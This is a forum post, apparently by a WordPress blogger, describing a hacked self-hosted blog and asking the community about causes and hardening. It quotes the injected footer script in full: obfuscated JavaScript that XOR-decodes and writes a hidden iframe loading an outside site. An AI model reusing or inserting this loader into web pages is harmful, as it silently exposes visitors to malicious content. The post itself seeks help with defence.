http://www.isheepthings.com/blog/ive-been-hacked/So my WP 2.7.1 (up to date) install was hacked. I'm not sure the exactly how long it was compromised but after digging in I finally found the script code that was causing the issue. Problem is I'm not sure exactly what that "issue" was. Both the Script and the site that it reference were written in Obfuscated code (
http://en.wikipedia.org/wiki/Obfuscated_code). Here is an example of what I saw between <SCRIPT></SCRIPT> tags at the footer of my blog...
Code:
q="=hgs`ld!rsb<iuuq;..`erbdod/hs.fnnfmd.ho/bfh>5!vheui<1!idhfiu<1!ruxmd<&whrhchmhux;iheedo&?=.hgs`ld?";w="";for(i=0;i<q.length;i++){w=w+String.fromCharCode(q.charCodeAt(i)^1);};document.write(w);
I'm not sure how it even happened. Perhaps it was some zero-day SQL injection but I wanted to ask the community if you've had anything like this happen to you (and I know a few have...just can't remember who posted about it) and what have you done to "step up" self hosted wp blog security to prevent it from happening in future.
Login
Register
FAQ
Members
